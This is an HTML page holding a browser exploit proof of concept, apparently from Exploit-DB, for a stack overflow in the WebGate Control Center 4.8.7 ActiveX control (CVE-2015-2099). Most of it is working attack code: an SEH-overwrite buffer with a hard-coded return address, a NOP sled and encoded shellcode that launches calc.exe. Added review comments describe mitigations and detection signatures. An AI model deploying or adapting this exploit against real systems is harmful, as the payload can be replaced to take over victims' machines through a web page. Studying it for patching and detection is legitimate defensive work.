WebGate Control Center 4.8.7 GetThumbnail Stack Overflow

<html>

<!--

Author: Praveen Darshanam

Security Unplugged !!!

Security Unplugged !!!

# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)

# Date: 27th March, 2015

# Vendor Homepage: WEBGATE | HD-CCTV solution provider

# Software Link: Software | HD DVR, HD camera, SD DVR, IP camera, storage, management software - WEBGATE

# Version: Control Center 4.8.7

# Tested on: Windows XP SP3 using IE/6/7/8

# CVE : 2015-2099

targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"

prototype = "Sub GetThumbnail ( ByVal SiteSerialNumber As String , ByVal Channel As Integer , ByVal secTime As Long , ByVal miliTime As Integer )"

progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"

NOTE(review): defender summary of this proof of concept. The page instantiates the
WESPPlaybackCtrl ActiveX control (CLSID in the object tag below; the hosting DLL is the
one named in targetFile) and calls GetThumbnail with a 5000-character SiteSerialNumber
string; per the title, that oversized string argument is what triggers the stack overflow.
The payload the page ships only launches calc.exe, i.e. it is a crash/execution marker.
Mitigations that apply whether or not the vendor has patched: set the Internet Explorer
ActiveX kill bit for this CLSID so the control cannot be scripted from a web page, keep
DEP and SEHOP enabled on the client, and uninstall the control where it is not needed.
Detection: the CLSID, the fixed nseh/seh byte values and the payload string below are
static and signature-friendly for proxy or endpoint rules. The "Tested on" line is the
only platform claim on this page; behaviour on other Windows versions is not established.

-->

<!-- Instantiates the control by CLSID; the script refers to it through the id "getthumb". -->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='getthumb'>

</object>

<script>

// Pieces that are concatenated into the single oversized SiteSerialNumber argument.
var buff1 = "";

// Channel, secTime and miliTime (see the prototype in the header comment); all left at 1.
var arg2=1;

var arg3=1;

var arg4=1;

var nops = "";

var buff2 = "";

// 24 filler bytes placed before the SEH record.
for (i=0;i<24; i++)

{

buff1 += "B";

}

// jump over seh to shellcode

// (assigned without var: implicit global, unchanged here)
nseh = "\xeb\x08PD";

// pop pop ret

// NOTE(review): a hard-coded 4-byte address; the PoC therefore depends on a module
// loaded at a fixed base, which is exactly what ASLR and SafeSEH-compiled modules deny.
var seh = "\xa0\xf2\x07\x10";

// 80 NOP (0x90) bytes in front of the payload.
for (i=0;i<80; i++)

{

nops += "\x90";

}

//calc.exe payload

// (per the comment above this only starts calc.exe; assigned without var)
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +

"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +

"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +

"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +

"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +

"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +

"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +

"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +

"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +

"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +

"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +

"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +

"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +

"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +

"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +

"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +

"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +

"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +

"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +

"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +

"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +

"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +

"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +

"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +

"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +

"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +

"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +

"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +

"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +

"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +

"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +

"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +

"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +

"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +

"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";

// Trailing "A" padding so the whole argument is exactly 5000 characters long.
for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)

{

buff2 += "A";

}

// Final SiteSerialNumber argument: filler, SEH record, NOPs, payload, padding (implicit global).
fbuff = buff1 + nseh + seh + nops + sc + buff2;

// Per the title, the overflow is triggered inside this call on the oversized first argument.
getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4);

</script>

</html>

Source: http://www.exploit-db.com/exploits/36518/
